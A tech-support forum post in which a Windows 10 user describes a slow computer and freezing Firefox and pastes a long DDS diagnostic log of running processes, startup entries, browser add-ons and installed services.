Channel: Tech Support Forum - Virus/Trojan/Spyware Help

Computer running slowly, web browsers specifically

My computer is running sluggishly. I have installed Windows 10 (I believe about 3 weeks ago) which may be part of the issue. I also believe my computer may have been without virus protection for a couple days (subscription for Norton expired). When I try opening Mozilla Firefox, the browser freezes a lot and makes it difficult to perform simple tasks. My computer has a quad-core processor, 16 GB RAM, etc. so it should not be slowed down by menial tasks. Startup takes quite a bit longer than it previously did (maybe partially due to Windows 10 upgrade?).

Thank you in advance for your help!

DDS (Ver_2012-11-20.01) - NTFS_AMD64
Internet Explorer: 11.0.10240.16412 BrowserJavaVersion: 11.45.2
Run by Chris at 18:37:06 on 2015-09-10
Microsoft Windows 10 Home 10.0.10240.0.1252.1.1033.18.8161.5456 [GMT -4:00]
.
AV: Norton 360 Premier *Enabled/Updated* {53C7D717-52E2-B95E-FA61-6F32ECC805DB}
AV: Windows Defender *Disabled/Updated* {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
AV: Ad-Aware Antivirus *Disabled/Outdated* {B0CC18C6-E527-6EE6-874C-9D19920E5619}
SP: Ad-Aware Antivirus *Disabled/Outdated* {0BADF922-C31D-6168-BDFC-A66BE9891CA4}
SP: Windows Defender *Disabled/Updated* {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
SP: Spybot - Search and Destroy *Disabled/Updated* {9BC38DF1-3CCA-732D-A930-C1CA5F20A4B0}
SP: Norton 360 Premier *Enabled/Updated* {E8A636F3-74D8-B6D0-C0D1-5440974F4F66}
FW: Ad-Aware Firewall *Disabled* {88F799E3-AF48-6FBE-AC13-342C6CDD1162}
FW: Norton 360 Premier *Enabled* {6BFC5632-188D-B806-D13E-C607121B42A0}
.
============== Running Processes ===============
.
C:\WINDOWS\system32\svchost.exe -k DcomLaunch
C:\WINDOWS\system32\svchost.exe -k RPCSS
C:\WINDOWS\system32\svchost.exe -k netsvcs
C:\WINDOWS\system32\dwm.exe
C:\WINDOWS\system32\svchost.exe -k LocalSystemNetworkRestricted
C:\WINDOWS\System32\svchost.exe -k LocalServiceNetworkRestricted
C:\Windows\system32\nvvsvc.exe
C:\WINDOWS\system32\svchost.exe -k LocalServiceAndNoImpersonation
C:\Program Files (x86)\NVIDIA Corporation\3D Vision\nvSCPAPISvr.exe
C:\Program Files\NVIDIA Corporation\Display\nvxdsync.exe
C:\WINDOWS\system32\nvvsvc.exe
C:\WINDOWS\system32\svchost.exe -k LocalService
C:\WINDOWS\System32\svchost.exe -k NetworkService
C:\WINDOWS\System32\spoolsv.exe
C:\WINDOWS\system32\svchost.exe -k LocalServiceNoNetwork
C:\WINDOWS\system32\svchost.exe -k NetworkServiceNetworkRestricted
C:\WINDOWS\System32\svchost.exe -k utcsvc
C:\WINDOWS\system32\svchost.exe -k apphost
C:\Program Files\Common Files\Apple\Mobile Device Support\AppleMobileDeviceService.exe
C:\WINDOWS\system32\dashost.exe
C:\Program Files\Lavasoft\Ad-Aware Antivirus\Ad-Aware Antivirus\11.8.586.8535\AdAwareService.exe
C:\Program Files (x86)\Norton One\Engine\3.2.2.12\ccSvcHst.exe
C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
C:\WINDOWS\system32\svchost.exe -k iissvcs
C:\Program Files (x86)\Lavasoft\Web Companion\TcpService\2.3.4.7\LavasoftTcpService.exe
C:\Program Files\NVIDIA Corporation\GeForce Experience Service\GfExperienceService.exe
C:\WINDOWS\system32\mqsvc.exe
C:\Program Files (x86)\NVIDIA Corporation\NetService\NvNetworkService.exe
C:\Program Files\Microsoft Office 15\ClientX64\OfficeClickToRun.exe
C:\Program Files\NVIDIA Corporation\NvStreamSrv\NvStreamService.exe
C:\Program Files (x86)\Spybot - Search & Destroy 2\SDUpdSvc.exe
C:\WINDOWS\system32\svchost.exe -k appmodel
C:\Program Files (x86)\Spybot - Search & Destroy 2\SDWSCSvc.exe
C:\WINDOWS\Microsoft.NET\Framework64\v4.0.30319\SMSvcHost.exe
C:\WINDOWS\Microsoft.NET\Framework64\v4.0.30319\SMSvcHost.exe
C:\Program Files\NVIDIA Corporation\NvStreamSrv\NvStreamNetworkService.exe
C:\WINDOWS\system32\wbem\wmiprvse.exe
C:\Program Files (x86)\Norton One\Engine\3.2.2.12\ccSvcHst.exe
C:\Program Files\NVIDIA Corporation\NvStreamSrv\NvStreamUserAgent.exe
C:\WINDOWS\system32\sihost.exe
C:\WINDOWS\system32\taskhostw.exe
C:\WINDOWS\Explorer.EXE
svchost.exe
C:\Windows\System32\RuntimeBroker.exe
C:\Program Files\NVIDIA Corporation\Display\nvtray.exe
C:\Program Files (x86)\NVIDIA Corporation\Update Core\NvBackend.exe
C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe
C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe
C:\WINDOWS\system32\SearchIndexer.exe
C:\Program Files\Realtek\Audio\HDA\RtkNGUI64.exe
C:\Program Files\iTunes\iTunesHelper.exe
C:\Program Files\Lavasoft\Ad-Aware Antivirus\Ad-Aware Antivirus\11.8.586.8535\AdAwareTray.exe
C:\Program Files (x86)\Lavasoft\Web Companion\Application\WebCompanion.exe
C:\WINDOWS\system32\fontdrvhost.exe
C:\Program Files (x86)\Renesas Electronics\USB 3.0 Host Controller Driver\Application\nusb3mon.exe
C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe
C:\Program Files (x86)\Spybot - Search & Destroy 2\SDTray.exe
C:\Program Files (x86)\Norton 360\Engine\22.5.2.15\N360.exe
C:\Program Files\iPod\bin\iPodService.exe
C:\Program Files (x86)\Norton 360\Engine\22.5.2.15\N360.exe
C:\WINDOWS\system32\svchost.exe -k UnistackSvcGroup
C:\Program Files (x86)\Steam\Steam.exe
C:\Program Files (x86)\Steam\bin\steamwebhelper.exe
C:\WINDOWS\Microsoft.Net\Framework64\v3.0\WPF\PresentationFontCache.exe
C:\Program Files (x86)\Common Files\Steam\SteamService.exe
C:\Program Files (x86)\Steam\bin\steamwebhelper.exe
C:\Program Files (x86)\Mozilla Firefox\firefox.exe
C:\Program Files (x86)\Mozilla Firefox\plugin-container.exe
C:\WINDOWS\SysWOW64\Macromed\Flash\FlashPlayerPlugin_18_0_0_232.exe
C:\WINDOWS\SysWOW64\Macromed\Flash\FlashPlayerPlugin_18_0_0_232.exe
C:\Windows\System32\InstallAgent.exe
C:\WINDOWS\system32\SearchProtocolHost.exe
C:\WINDOWS\system32\wbem\wmiprvse.exe
C:\WINDOWS\system32\SearchProtocolHost.exe
C:\WINDOWS\system32\SearchFilterHost.exe
C:\WINDOWS\System32\cscript.exe
.
============== Pseudo HJT Report ===============
.
uStart Page = hxxp://www.bing.com/?pc=COSP&ptag=D091015-A60FA26CFB78147A880F&form=CONMHP&conlogo=CT3332038
BHO: Adobe PDF Link Helper: {18DF081C-E8AD-4283-A596-FA578C2EBDC3} - C:\Program Files (x86)\Common Files\Adobe\Acrobat\ActiveX\AcroIEHelperShim.dll
BHO: Skype for Business Browser Helper: {31D09BA0-12F5-4CCE-BE8A-2923E76605DA} - C:\Program Files\Microsoft Office 15\root\office15\ochelper.dll
BHO: Norton Identity Protection: {602ADB0E-4AFF-4217-8AA1-95DAC4DFA408} - C:\Program Files (x86)\Norton 360\Engine\22.5.2.15\coieplg.dll
BHO: Norton Vulnerability Protection: {6D53EC84-6AAE-4787-AEEE-F4628F01010C} -
BHO: Java(tm) Plug-In SSV Helper: {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} - C:\Program Files (x86)\Java\jre1.8.0_45\bin\ssv.dll
BHO: ArcPluginIEBHO Class: {84BFE29A-8139-402a-B2A4-C23AE9E1A75F} - C:\Program Files (x86)\Perfect World Entertainment\Arc\plugins\ArcPluginIE.dll
BHO: Microsoft SkyDrive Pro Browser Helper: {D0498E0A-45B7-42AE-A9AA-ABA463DBD3BF} - C:\Program Files\Microsoft Office 15\root\office15\grooveex.dll
BHO: Java(tm) Plug-In 2 SSV Helper: {DBC80044-A445-435b-BC74-9C25C1C588A9} - C:\Program Files (x86)\Java\jre1.8.0_45\bin\jp2ssv.dll
TB: Norton Toolbar: {7FEBEFE3-6B19-4349-98D2-FFB09D4B49CA} - C:\Program Files (x86)\Norton 360\Engine\22.5.2.15\coieplg.dll
uRun: [Steam] "C:\Program Files (x86)\Steam\steam.exe" -silent
uRun: [GoogleChromeAutoLaunch_4E6299B33FA0592A57BB7C6E94F010D2] "C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" --no-startup-window
uRun: [Spotify Web Helper] "C:\Users\Chris\AppData\Roaming\Spotify\SpotifyWebHelper.exe"
uRun: [Web Companion] C:\Program Files (x86)\Lavasoft\Web Companion\Application\WebCompanion.exe --minimize
uRun: [SpybotPostWindows10UpgradeReInstall] "C:\Program Files\Common Files\AV\Spybot - Search and Destroy\Test.exe"
mRun: [NUSB3MON] "C:\Program Files (x86)\Renesas Electronics\USB 3.0 Host Controller Driver\Application\nusb3mon.exe"
mRun: [SunJavaUpdateSched] "C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe"
mRun: [SDTray] "C:\Program Files (x86)\Spybot - Search & Destroy 2\SDTray.exe"
uPolicies-Explorer: NoDriveTypeAutoRun = dword:0
mPolicies-System: DSCAutomationHostEnabled = dword:2
IE: E&xport to Microsoft Excel - C:\Program Files\Microsoft Office 15\Root\Office15\EXCEL.EXE/3000
IE: Se&nd to OneNote - C:\Program Files\Microsoft Office 15\Root\Office15\ONBttnIE.dll/105
IE: {2670000A-7350-4f3c-8081-5663EE0C6C49} - {48E73304-E1D6-4330-914C-F5F514E3486C} - C:\Program Files\Microsoft Office 15\root\office15\onbttnie.dll
IE: {31D09BA0-12F5-4CCE-BE8A-2923E76605DA} - {31D09BA0-12F5-4CCE-BE8A-2923E76605DA} - C:\Program Files\Microsoft Office 15\root\office15\ochelper.dll
IE: {789FE86F-6FC4-46A1-9849-EDE0DB0C95CA} - {FFFDC614-B694-4AE6-AB38-5D6374584B52} - C:\Program Files\Microsoft Office 15\root\office15\ONBttnIELinkedNotes.dll
LSP: C:\WINDOWS\System32\LavasoftTcpService.dll
Trusted Zone: clonewarsadventures.com
Trusted Zone: freerealms.com
Trusted Zone: localhost
Trusted Zone: soe.com
Trusted Zone: sony.com
Trusted Zone: webcompanion.com
DPF: {F27237D7-93C8-44C2-AC6E-D6057B9A918F} - hxxps://juniper.net/dana-cached/sc/JuniperSetupClient.cab
TCP: NameServer = 75.75.75.75 75.75.76.76
TCP: Interfaces\{1ac715e4-524d-40eb-8e44-73e6ef19aed1} : DHCPNameServer = 75.75.75.75 75.75.76.76
Handler: osf - {D924BDC6-C83A-4BD5-90D0-095128A113D1} - C:\Program Files\Microsoft Office 15\root\office15\msosb.dll
Handler: tbauth - {14654CA6-5711-491D-B89A-58E571679951} - C:\Windows\SysWOW64\tbauth.dll
Notify: SDWinLogon - SDWinLogon.dll
SSODL: WebCheck - <orphaned>
mASetup: {8A69D345-D564-463c-AFF1-A69D9E530F96} - "C:\Program Files (x86)\Google\Chrome\Application\45.0.2454.85\Installer\chrmstp.exe" --configure-user-settings --verbose-logging --system-level --multi-install --chrome
CLSID: {603D3801-BD81-11d0-A3A5-00C04FD706EC} - C:\WINDOWS\System32\windows.storage.dll
x64-BHO: Skype for Business Browser Helper: {31D09BA0-12F5-4CCE-BE8A-2923E76605DA} - C:\Program Files\Microsoft Office 15\root\vfs\ProgramFilesX64\Microsoft Office\Office15\ochelper.dll
x64-BHO: Norton Identity Protection: {602ADB0E-4AFF-4217-8AA1-95DAC4DFA408} - C:\Program Files (x86)\Norton 360\Engine64\22.5.2.15\coieplg.dll
x64-BHO: Office Document Cache Handler: {B4F3A835-0E21-4959-BA22-42B3008E02FF} - C:\Program Files\Microsoft Office 15\root\vfs\ProgramFilesX64\Microsoft Office\Office15\urlredir.dll
x64-BHO: Microsoft SkyDrive Pro Browser Helper: {D0498E0A-45B7-42AE-A9AA-ABA463DBD3BF} - C:\Program Files\Microsoft Office 15\root\vfs\ProgramFilesX64\Microsoft Office\Office15\grooveex.dll
x64-TB: Norton Toolbar: {7FEBEFE3-6B19-4349-98D2-FFB09D4B49CA} - C:\Program Files (x86)\Norton 360\Engine64\22.5.2.15\coieplg.dll
x64-Run: [RTHDVCPL] "C:\Program Files\Realtek\Audio\HDA\RtkNGUI64.exe" -s
x64-Run: [NvBackend] "C:\Program Files (x86)\NVIDIA Corporation\Update Core\NvBackend.exe"
x64-Run: [ShadowPlay] C:\WINDOWS\System32\rundll32.exe C:\WINDOWS\System32\nvspcap64.dll,ShadowPlayOnSystemStart
x64-Run: [iTunesHelper] "C:\Program Files\iTunes\iTunesHelper.exe"
x64-Run: [AdAwareTray] "C:\Program Files\Lavasoft\Ad-Aware Antivirus\Ad-Aware Antivirus\11.8.586.8535\AdAwareTray.exe"
x64-mPolicies-System: DSCAutomationHostEnabled = dword:2
x64-IE: {2670000A-7350-4f3c-8081-5663EE0C6C49} - {48E73304-E1D6-4330-914C-F5F514E3486C} - C:\Program Files\Microsoft Office 15\root\vfs\ProgramFilesX64\Microsoft Office\Office15\onbttnie.dll
x64-IE: {31D09BA0-12F5-4CCE-BE8A-2923E76605DA} - {31D09BA0-12F5-4CCE-BE8A-2923E76605DA} - C:\Program Files\Microsoft Office 15\root\vfs\ProgramFilesX64\Microsoft Office\Office15\ochelper.dll
x64-IE: {789FE86F-6FC4-46A1-9849-EDE0DB0C95CA} - {FFFDC614-B694-4AE6-AB38-5D6374584B52} - C:\Program Files\Microsoft Office 15\root\vfs\ProgramFilesX64\Microsoft Office\Office15\ONBttnIELinkedNotes.dll
x64-Handler: osf - {D924BDC6-C83A-4BD5-90D0-095128A113D1} - <orphaned>
x64-Handler: tbauth - {14654CA6-5711-491D-B89A-58E571679951} - C:\WINDOWS\System32\tbauth.dll
x64-SSODL: WebCheck - <orphaned>
x64-mASetup: {2C7339CF-2B09-4501-B3F3-F3508C9228ED} - /UserInstall
x64-mASetup: {89820200-ECBD-11cf-8B85-00AA005B4340} - U
x64-CLSID: {603D3801-BD81-11d0-A3A5-00C04FD706EC} - C:\WINDOWS\System32\windows.storage.dll
.
================= FIREFOX ===================
.
FF - ProfilePath - C:\Users\Chris\AppData\Roaming\Mozilla\Firefox\Profiles\xampi2j7.default\
FF - prefs.js: browser.search.selectedEngine - Bing
FF - prefs.js: browser.startup.homepage - hxxp://www.bing.com/?pc=COSP&ptag=D091015-A60FA26CFB78147A880F&form=CONMHP&conlogo=CT3332038
FF - prefs.js: keyword.URL - hxxps://search.yahoo.com/search?fr=greentree_ff1&ei=utf-8&ilc=12&type=903578&p=
FF - plugin: C:\Program Files (x86)\Adobe\Reader 10.0\Reader\AIR\nppdf32.dll
FF - plugin: C:\Program Files (x86)\Google\Update\1.3.28.13\npGoogleUpdate3.dll
FF - plugin: C:\Program Files (x86)\Java\jre1.8.0_45\bin\dtplugin\npdeployJava1.dll
FF - plugin: C:\Program Files (x86)\Java\jre1.8.0_45\bin\plugin2\npjp2.dll
FF - plugin: c:\Program Files (x86)\Microsoft Silverlight\5.1.40728.0\npctrlui.dll
FF - plugin: C:\Program Files (x86)\NVIDIA Corporation\3D Vision\npnv3dv.dll
FF - plugin: C:\Program Files (x86)\NVIDIA Corporation\3D Vision\npnv3dvstreaming.dll
FF - plugin: C:\Program Files (x86)\Perfect World Entertainment\Arc\Plugins\npArcPluginFF.dll
FF - plugin: C:\Program Files\Microsoft Office 15\root\Office15\NPSPWRAP.DLL
FF - plugin: C:\Program Files\Microsoft Office 15\root\VFS\ProgramFilesX86\Mozilla Firefox\plugins\npMeetingJoinPluginOC.dll
FF - plugin: C:\Users\Chris\AppData\Local\Citrix\Plugins\104\npappdetector.dll
FF - plugin: C:\WINDOWS\SysWOW64\Macromed\Flash\NPSWF32_18_0_0_232.dll
.
============= SERVICES / DRIVERS ===============
.
R0 SymEFASI;Symantec Extended File Attributes (SI);C:\WINDOWS\System32\drivers\N360x64\1605020.00F\symefasi64.sys [2015-7-26 1620720]
R0 WindowsTrustedRT;Windows Trusted Execution Environment Class Extension;C:\WINDOWS\System32\drivers\WindowsTrustedRT.sys [2015-7-10 106520]
R0 WindowsTrustedRTProxy;Microsoft Windows Trusted Runtime Secure Service;C:\WINDOWS\System32\drivers\WindowsTrustedRTProxy.sys [2015-7-10 17944]
R0 Wof;Windows Overlay File System Filter Driver;C:\WINDOWS\System32\drivers\wof.sys [2015-8-11 200528]
R1 ahcache;Application Compatibility Cache;C:\WINDOWS\System32\drivers\ahcache.sys [2015-7-10 215552]
R1 BHDrvx64;BHDrvx64;C:\Program Files (x86)\Norton 360\NortonData\22.5.0.124\Definitions\BASHDefs\20150904.001\BHDrvx64.sys [2015-9-9 1650936]
R1 ccSet_MCLIENT;Norton One Settings Manager;C:\WINDOWS\System32\drivers\MCLIENTx64\0302020.00C\ccSetx64.sys [2013-10-15 168096]
R1 ccSet_N360;N360 Settings Manager;C:\WINDOWS\System32\drivers\N360x64\1605020.00F\ccsetx64.sys [2015-7-26 173808]
R1 FileCrypt;FileCrypt;C:\WINDOWS\System32\drivers\filecrypt.sys [2015-7-10 83968]
R1 GpuEnergyDrv;GPU Energy Driver;C:\WINDOWS\System32\drivers\gpuenergydrv.sys [2015-7-10 8192]
R1 IDSVia64;IDSVia64;C:\Program Files (x86)\Norton 360\NortonData\22.5.0.124\Definitions\IPSDefs\20150909.001\IDSviA64.sys [2015-9-9 767224]
R1 SymIRON;Symantec Iron Driver;C:\WINDOWS\System32\drivers\N360x64\1605020.00F\ironx64.sys [2015-7-26 297720]
R1 SymNetS;Symantec Network Security WFP Driver;C:\WINDOWS\System32\drivers\N360x64\1605020.00F\symnets.sys [2015-7-26 576248]
R2 Apple Mobile Device Service;Apple Mobile Device Service;C:\Program Files\Common Files\Apple\Mobile Device Support\AppleMobileDeviceService.exe [2015-5-29 77128]
R2 ClickToRunSvc;Microsoft Office ClickToRun Service;C:\Program Files\Microsoft Office 15\ClientX64\officeclicktorun.exe [2014-3-26 2765496]
R2 CoreMessagingRegistrar;CoreMessaging;C:\WINDOWS\System32\svchost.exe -k LocalServiceNoNetwork [2015-7-10 39856]
R2 DiagTrack;Diagnostics Tracking Service;C:\WINDOWS\System32\svchost.exe -k utcsvc [2015-7-10 39856]
R2 DoSvc;Delivery Optimization;C:\WINDOWS\System32\svchost.exe -k netsvcs [2015-7-10 39856]
R2 GfExperienceService;NVIDIA GeForce Experience Service;C:\Program Files\NVIDIA Corporation\GeForce Experience Service\GfExperienceService.exe [2015-1-14 1155192]
R2 LavasoftAdAwareService11;Ad-Aware Service 11;C:\Program Files\Lavasoft\Ad-Aware Antivirus\Ad-Aware Antivirus\11.8.586.8535\AdAwareService.exe [2015-8-27 712432]
R2 LavasoftTcpService;LavasoftTcpService;C:\Program Files (x86)\Lavasoft\Web Companion\TcpService\2.3.4.7\LavasoftTcpService.exe [2015-9-9 2751760]
R2 MCLIENT;Norton One;C:\Program Files (x86)\Norton One\Engine\3.2.2.12\ccSvcHst.exe [2013-10-15 143928]
R2 N360;Norton 360;C:\Program Files (x86)\Norton 360\Engine\22.5.2.15\n360.exe [2015-7-26 282016]
R2 NvNetworkService;NVIDIA Network Service;C:\Program Files (x86)\NVIDIA Corporation\NetService\NvNetworkService.exe [2015-1-14 1872504]
R2 NvStreamSvc;NVIDIA Streamer Service;C:\Program Files\NVIDIA Corporation\NvStreamSrv\NvStreamService.exe [2015-7-29 5544568]
R2 SDUpdateService;Spybot-S&D 2 Updating Service;C:\Program Files (x86)\Spybot - Search & Destroy 2\SDUpdSvc.exe [2015-9-9 2088408]
R2 SDWSCService;Spybot-S&D 2 Security Center Service;C:\Program Files (x86)\Spybot - Search & Destroy 2\SDWSCSvc.exe [2015-9-9 171928]
R2 Stereo Service;NVIDIA Stereoscopic 3D Driver Service;C:\Program Files (x86)\NVIDIA Corporation\3D Vision\nvSCPAPISvr.exe [2015-9-1 410744]
R2 storqosflt;Storage QoS Filter Driver;C:\WINDOWS\System32\drivers\storqosflt.sys [2015-7-10 61952]
R2 tiledatamodelsvc;Tile Data model server;C:\WINDOWS\System32\svchost.exe -k appmodel [2015-7-10 39856]
R2 UserManager;User Manager;C:\WINDOWS\System32\svchost.exe -k netsvcs [2015-7-10 39856]
R3 AppXSvc;AppX Deployment Service (AppXSVC);C:\WINDOWS\System32\svchost.exe -k wsappx [2015-7-10 39856]
R3 ClipSVC;Client License Service (ClipSVC);C:\WINDOWS\System32\svchost.exe -k wsappx [2015-7-10 39856]
R3 EraserUtilRebootDrv;EraserUtilRebootDrv;C:\Program Files (x86)\Common Files\Symantec Shared\EENGINE\EraserUtilRebootDrv.sys [2015-9-9 155456]
R3 LicenseManager;Windows License Manager Service;C:\WINDOWS\System32\svchost.exe -k LocalService [2015-7-10 39856]
R3 MBfilt;MBfilt;C:\WINDOWS\System32\drivers\MBfilt64.sys [2015-6-24 41088]
R3 NcbService;Network Connection Broker;C:\WINDOWS\System32\svchost.exe -k LocalSystemNetworkRestricted [2015-7-10 39856]
R3 NdisVirtualBus;Microsoft Virtual Network Adapter Enumerator;C:\WINDOWS\System32\drivers\NdisVirtualBus.sys [2015-7-10 20992]
R3 NvStreamKms;NvStreamKms;C:\Program Files\NVIDIA Corporation\NvStreamSrv\NvStreamKms.sys [2015-1-14 19576]
R3 nvvad_WaveExtensible;NVIDIA Virtual Audio Device (Wave Extensible) (WDM);C:\WINDOWS\System32\drivers\nvvad64v.sys [2015-6-14 50472]
R3 rt640x64;Realtek RT640 NT Driver;C:\WINDOWS\System32\drivers\rt640x64.sys [2015-7-10 587264]
R3 ScpVBus;Scp Virtual Bus Driver;C:\WINDOWS\System32\drivers\ScpVBus.sys [2013-5-5 39168]
R3 StateRepository;State Repository Service;C:\WINDOWS\System32\svchost.exe -k appmodel [2015-7-10 39856]
S0 SymELAM;Symantec ELAM Driver;C:\WINDOWS\System32\drivers\N360x64\1605020.00F\symelam.sys [2015-7-26 24192]
S2 dmwappushservice;dmwappushsvc;C:\WINDOWS\System32\svchost.exe -k netsvcs [2015-7-10 39856]
S2 MapsBroker;Downloaded Maps Manager;C:\WINDOWS\System32\svchost.exe -k NetworkService [2015-7-10 39856]
S2 SDScannerService;Spybot-S&D 2 Scanner Service;C:\Program Files (x86)\Spybot - Search & Destroy 2\SDFSSvc.exe [2015-9-9 1738168]
S2 SearchProtectionService;IE Search Set;C:\Program Files (x86)\Lavasoft\Web Companion\Application\Lavasoft.SearchProtect.WinService.exe [2015-9-9 16656]
S3 ADP80XX;ADP80XX;C:\WINDOWS\System32\drivers\adp80xx.sys [2015-7-10 1135456]
S3 AJRouter;AllJoyn Router Service;C:\WINDOWS\System32\svchost.exe -k LocalService [2015-7-10 39856]
S3 AppReadiness;App Readiness;C:\WINDOWS\System32\svchost.exe -k AppReadiness [2015-7-10 39856]
S3 bcmfn2;bcmfn2 Service;C:\WINDOWS\System32\drivers\bcmfn2.sys [2015-7-10 17624]
S3 BthHFSrv;Bluetooth Handsfree Service;C:\WINDOWS\System32\svchost.exe -k LocalServiceAndNoImpersonation [2015-7-10 39856]
S3 buttonconverter;Service for Portable Device Control devices;C:\WINDOWS\System32\drivers\buttonconverter.sys [2015-7-10 32256]
S3 cancel;cancel;C:\Program Files (x86)\MSI\Super-Charger\cancel_64.sys [2012-9-5 16184]
S3 CapImg;HID driver for CapImg touch screen;C:\WINDOWS\System32\drivers\capimg.sys [2015-7-10 116736]
S3 CDPSvc;CDPSvc;C:\WINDOWS\System32\svchost.exe -k LocalService [2015-7-10 39856]
S3 DcpSvc;DataCollectionPublishingService;C:\WINDOWS\System32\svchost.exe -k netsvcs [2015-7-10 39856]
S3 DevQueryBroker;DevQuery Background Discovery Broker;C:\WINDOWS\System32\svchost.exe -k LocalSystemNetworkRestricted [2015-7-10 39856]
S3 diagnosticshub.standardcollector.service;Microsoft (R) Diagnostics Hub Standard Collector Service;C:\WINDOWS\System32\DiagSvcs\DiagnosticsHub.StandardCollector.Service.exe [2015-7-10 27136]
S3 DmEnrollmentSvc;Device Management Enrollment Service;C:\WINDOWS\System32\svchost.exe -k netsvcs [2015-7-10 39856]
S3 DsSvc;Data Sharing Service;C:\WINDOWS\System32\svchost.exe -k LocalSystemNetworkRestricted [2015-7-10 39856]
S3 EasyAntiCheat;EasyAntiCheat;C:\WINDOWS\System32\EasyAntiCheat.exe --> C:\WINDOWS\System32\EasyAntiCheat.exe [?]
S3 embeddedmode;embeddedmode;C:\WINDOWS\System32\svchost.exe -k LocalSystemNetworkRestricted [2015-7-10 39856]
S3 EntAppSvc;Enterprise App Management Service;C:\WINDOWS\System32\svchost.exe -k appmodel [2015-7-10 39856]
S3 fcvsc;fcvsc;C:\WINDOWS\System32\drivers\fcvsc.sys [2015-7-10 31232]
S3 genericusbfn;Generic USB Function Class;C:\WINDOWS\System32\drivers\genericusbfn.sys [2015-7-10 20992]
S3 hidinterrupt;Common Driver for HID Buttons implemented with interrupts;C:\WINDOWS\System32\drivers\hidinterrupt.sys [2015-7-10 50016]
S3 iaLPSSi_GPIO;Intel(R) Serial IO GPIO Controller Driver;C:\WINDOWS\System32\drivers\iaLPSSi_GPIO.sys [2015-7-10 38128]
S3 iaLPSSi_I2C;Intel(R) Serial IO I2C Controller Driver;C:\WINDOWS\System32\drivers\iaLPSSi_I2C.sys [2015-7-10 122608]
S3 iaStorAV;Intel(R) SATA RAID Controller Windows;C:\WINDOWS\System32\drivers\iaStorAV.sys [2015-7-10 673120]
S3 ibbus;Mellanox InfiniBand Bus/AL (Filter Driver);C:\WINDOWS\System32\drivers\ibbus.sys [2015-7-10 424800]
S3 icssvc;Windows Mobile Hotspot Service;C:\WINDOWS\System32\svchost.exe -k LocalServiceNetworkRestricted [2015-7-10 39856]
S3 IEEtwCollectorService;Internet Explorer ETW Collector Service;C:\WINDOWS\System32\ieetwcollector.exe [2015-7-10 115200]
S3 intelpep;Intel(R) Power Engine Plug-in Driver;C:\WINDOWS\System32\drivers\intelpep.sys [2015-7-10 43872]
S3 IoQos;IoQos;C:\WINDOWS\System32\drivers\ioqos.sys [2015-7-10 26624]
S3 lfsvc;Geolocation Service;C:\WINDOWS\System32\svchost.exe -k netsvcs [2015-7-10 39856]
S3 LSI_SAS2i;LSI_SAS2i;C:\WINDOWS\System32\drivers\lsi_sas2i.sys [2015-7-10 104800]
S3 LSI_SAS3i;LSI_SAS3i;C:\WINDOWS\System32\drivers\lsi_sas3i.sys [2015-7-10 99168]
S3 mlx4_bus;Mellanox ConnectX Bus Enumerator;C:\WINDOWS\System32\drivers\mlx4_bus.sys [2015-7-10 705376]
S3 ndfltr;NetworkDirect Service;C:\WINDOWS\System32\drivers\ndfltr.sys [2015-7-10 76128]
S3 NetSetupSvc;Network Setup Service;C:\WINDOWS\System32\svchost.exe -k netsvcs [2015-7-10 39856]
S3 netvsc;netvsc;C:\WINDOWS\System32\drivers\netvsc.sys [2015-7-10 94720]
S3 NgcCtnrSvc;Microsoft Passport Container;C:\WINDOWS\System32\svchost.exe -k LocalServiceNetworkRestricted [2015-7-10 39856]
S3 NgcSvc;Microsoft Passport;C:\WINDOWS\System32\lsass.exe [2015-7-10 56344]
S3 NTIOLib_1_0_3;NTIOLib_1_0_3;C:\Program Files (x86)\MSI\Super-Charger\NTIOLib_X64.sys [2012-9-5 14136]
S3 percsas2i;percsas2i;C:\WINDOWS\System32\drivers\percsas2i.sys [2015-7-10 58208]
S3 percsas3i;percsas3i;C:\WINDOWS\System32\drivers\percsas3i.sys [2015-7-10 58720]
S3 ReFSv1;ReFSv1;C:\WINDOWS\System32\drivers\refsv1.sys [2015-7-30 934752]
S3 RetailDemo;Retail Demo Service;C:\WINDOWS\System32\svchost.exe -k netsvcs [2015-7-10 39856]
S3 ScDeviceEnum;Smart Card Device Enumeration Service;C:\WINDOWS\System32\svchost.exe -k LocalSystemNetworkRestricted [2015-7-10 39856]
S3 SensorDataService;Sensor Data Service;C:\WINDOWS\System32\SensorDataService.exe [2015-7-30 1031680]
S3 SensorService;Sensor Service;C:\WINDOWS\System32\svchost.exe -k LocalSystemNetworkRestricted [2015-7-10 39856]
S3 SerCx2;Serial UART Support Library;C:\WINDOWS\System32\drivers\SerCx2.sys [2015-7-10 155488]
S3 smphost;Microsoft Storage Spaces SMP;C:\WINDOWS\System32\svchost.exe -k smphost [2015-7-10 39856]
S3 SmsRouter;Microsoft Windows SMS Router Service.;C:\WINDOWS\System32\svchost.exe -k LocalSystemNetworkRestricted [2015-7-10 39856]
S3 stornvme;Microsoft Standard NVM Express Driver;C:\WINDOWS\System32\drivers\stornvme.sys [2015-8-19 80720]
S3 storufs;Microsoft Universal Flash Storage (UFS) Driver;C:\WINDOWS\System32\drivers\storufs.sys [2015-7-10 40288]
S3 UcmCx0101;USB Connector Manager KMDF Class Extension;C:\WINDOWS\System32\drivers\UcmCx.sys [2015-7-10 61952]
S3 UcmUcsi;USB Connector Manager UCSI Client;C:\WINDOWS\System32\drivers\UcmUcsi.sys [2015-7-30 46080]
S3 UdeCx;USB Device Emulation Support Library;C:\WINDOWS\System32\drivers\Udecx.sys [2015-7-10 44032]
S3 UEFI;Microsoft UEFI Driver;C:\WINDOWS\System32\drivers\uefi.sys [2015-7-10 28512]
S3 Ufx01000;USB Function Class Extension;C:\WINDOWS\System32\drivers\ufx01000.sys [2015-7-10 245088]
S3 UfxChipidea;USB Chipidea Controller;C:\WINDOWS\System32\drivers\UfxChipidea.sys [2015-7-10 94048]
S3 ufxsynopsys;USB Synopsys Controller;C:\WINDOWS\System32\drivers\ufxsynopsys.sys [2015-7-10 127840]
